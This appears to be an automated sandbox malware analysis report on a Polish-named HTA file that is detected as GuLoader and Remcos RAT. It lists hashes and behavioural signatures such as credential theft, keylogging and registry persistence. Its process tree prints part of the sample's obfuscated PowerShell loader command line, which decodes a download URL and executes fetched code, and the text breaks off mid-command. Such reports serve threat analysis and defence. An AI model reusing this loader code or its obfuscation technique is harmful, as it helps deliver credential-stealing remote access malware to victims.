Edit tour
Windows
Analysis Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
Overview
General Information
Sample name: | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htarenamed because original name is a hash value |
Original sample name: | PLOCMR-002 Dane dotyczce dokumentw i towarw.hta |
Analysis ID: | 1435041 |
MD5: | 86816f2832da46166cc3079c4c32a2d6 |
SHA1: | a92657644d8dff7c7801eb465ca91e22767998b3 |
SHA256: | 655f862dff56546606f574d6ca39a4f7dc0d3f5fc22d3f2e3cd3562e7c78a63e |
Infos: | |
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3716 cmdline:
mshta.exe "C:\Users\ user\Deskt op\PLOCMR- 002 Dane d otycz#U010 5ce dokume nt#U00f3w i towar#U0 0f3w.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 3748 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Kostplan en = 1;$Fa rvervej='S ubstrin';$ Farvervej+ ='g';Funct ion Bortle dede($Heks ekedlen220 ){$Electro static=$He ksekedlen2 20.Length- $Kostplane n;For($Lse hovederne= 4; $Lsehov ederne -lt $Electros tatic; $Ls ehovederne +=(5)){$Te aseled+=$H eksekedlen 220.$Farve rvej.Invok e($Lsehove derne, $Ko stplanen); }$Teaseled ;}function Oraklerne ($Forpagtn igsafgifte ns110){. ( $Attackman ) ($Forpag tnigsafgif tens110);} $Rheophore =Bortleded e 'BullM E ftoTur,zSi kkiQ.aflB ssl Prea R ew/Udlb5Te tr.Bill0Ov er quic( R o,WIodiiF rgn G.sdLa ndo AfgwCy kes.agt Br acN Fl,TBr ok Pic,1Je tm0Lagr.Me gi0Sho.; A pp AntiWLa iciSygenHy mn6F,rr4 U nf;.rov al vaxAzox6Wa pa4 Del;Pa ca Pro.r H ydvOutl:U. de1Pea.2 S ca1.ntr.E. mo0slap)N. nc WindG A bleCompc U ntkHor,o , ei/slre2.r ol0 Fir1 U ,a0Pann0Ba g.1Sten0fo rt1 arm Re ,F katiA a crUnreeprp fCo,soNap hx Cl / An ,1Bero2Ind s1trlb.Mu k0An.i ';$ prologfort olkere=Bor tledede 'O phrU jrsMa age GonrSk b-MassAPe ntgUn,se R etnHa rt,n ar ';$Renp risen=Bort ledede 'Ar thhKurdtCy ,itRamppGa be:Hedt/ . ig/ anv8Fl yt7 Hom.Ex tr1 ype2Pr ee1Fris.Bo l 1Lovp0Po st5Cott.Sa mm1P,th6 M a 3 Dis/ d nSBefouFli nbTeoduA h emSandb,ea piSheelFor gi,ishcPyn taNar lPar . MardSku fw Lemp Po s ';$Burge ssdom=Bort ledede 'W, ip>Til ';$ Attackman= Bortledede 'Reisi,on ce,agaxR.g i ';$Robaa des='Skjol ddragerens ';Oraklern e (Bortled ede 'D.siS .pveTec.t Coll-ElecC UnioBevin M.katL jle P,rnH.sht ,rem Van,- RecuPTa ta OvertMassh ,el Ro.dT Siou: Bru\ TschtDesce ProglPrefe E.ptfBarbo SemirH,alb odiRenonS ,rid erre rovlFremsO mkoe UdbnD gndsSagv.f rstSpirxR esutLett I os-nonsV V,sa LoelS isbuFriteG ain Exo$Un dlRLithoDe dibStttaLo coaSol,dRe see FowsCo nv;sogg ') ;Oraklerne (Bortlede de 'PlagiF or,f For D .to( OpvtT aste ChrsG rnstMid.- Forp EftaF as,t,tophA rtu KoitTS t g:Ande\ CystS,are atalAflae. dmof,efioL novrpantbe x,si Vi.nL sepdSka eM alul Heas vege FornP aras,ore.M .set CarxH iertAncr) P,e{FogeeT ranxRaadik erntKirk}S yn,;Kase ' );$Baetyli c = Bortle dede 'Kult e,ondcE,sa hA atoTouc Nono% Ste a VilpI te pGly d Tro aT drtLi.g a Cen%gara \ ,igI Fos dHyp.e Das aEighlMand oSvrtgGesj iStu.cCass aAr,plPeal 1B ef4Rive 3Si.n.Pab. cBaudhKla. oForr Ter& D,n&A.gl konveVrdic BabbhCompo Neoc S ta$ Sem ';Ora klerne (Bo rtledede ' .ype$Infeg B,atlFl,ko .ucubFrita Ex.alGlo,: s moF ap,r CataoThyrg R kmVugge Ach,nVars= Vare( Frec matemPistd and Spir/ Ant.cDigi Pach$ F,rB ProtaShine Cy t Depy Ca,rlSelvi FagcSucc) Mora ');Or aklerne (B ortledede 'Pres$Lykn gBedalTape oNakebTelp aSvvnlRaci :MorbDSmot iT pmsCplf pW seoUro. n Tope Ska nStyrtFlyv etrskn Anc h .reeForm dpappeUple